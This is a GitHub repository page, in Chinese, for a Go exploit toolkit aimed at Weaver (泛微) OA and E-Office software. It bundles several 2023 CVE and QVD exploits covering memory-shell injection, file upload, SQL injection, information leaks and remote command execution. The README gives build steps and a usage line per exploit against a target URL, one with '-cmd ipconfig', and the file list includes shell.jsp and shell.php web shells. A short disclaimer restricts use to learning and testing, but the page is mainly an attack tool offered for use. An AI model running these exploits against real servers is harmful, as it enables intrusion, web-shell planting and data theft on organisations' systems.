WeaverExploit_All

泛微最近的漏洞利用工具（PS：2023）

集成了QVD-2023-5012、CVE-2023-2523、CVE-2023-2648、getloginid_ofsLogin 漏洞利用

2023.7.26：新增：WorkflowServiceXml 内存马注入、uploaderOperate文件上传漏洞、DeleteUserRequestInfoByXml 、FileDownloadForOutDocSQL注入、E-Mobile 6.0 命令执行漏洞检测

20238.05：新增泛微E-Office 信息泄露、未授权漏洞

0x001 编译使用

go build -o WeaverExloit-All.exe .\main.go

0x002 使用方法

默认全部poc

WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc QVD-2023-5012
WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc CVE-2023-2523
WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc CVE-2023-2648
WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc getloginid_ofsLogin
WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc DeleteUserRequestInfoByXml
WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc WorkFlowServiceXml
WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc UploaderOperate
WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc FileDownloadForOutDocSQL
WeaverExloit-All.exe --target http://127.0.0.1:8080/ --poc E_Mobile_client  -cmd ipconfig

dnslog 地址放到config/config.txt中

0x003 仅供测试使用

免责声明：本工具不得用于商业用途,仅做学习交流，如用作他途造成的一切后果请自行承担！

Name		Name	Last commit message	Last commit date
Latest commit History 16 Commits
Config		Config
img		img
poc		poc
README.md		README.md
go.mod		go.mod
main.go		main.go
shell.jsp		shell.jsp
shell.php		shell.php

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Repository files navigation

WeaverExploit_All

0x001 编译使用

0x002 使用方法

0x003 仅供测试使用

About

Releases

Packages

Languages

superway117/WeaverExploit_All

Folders and files

Latest commit

History

Repository files navigation

WeaverExploit_All

0x001 编译使用

0x002 使用方法

0x003 仅供测试使用

About

Resources

Stars

Watchers

Forks

Releases

Packages 0

Languages

Packages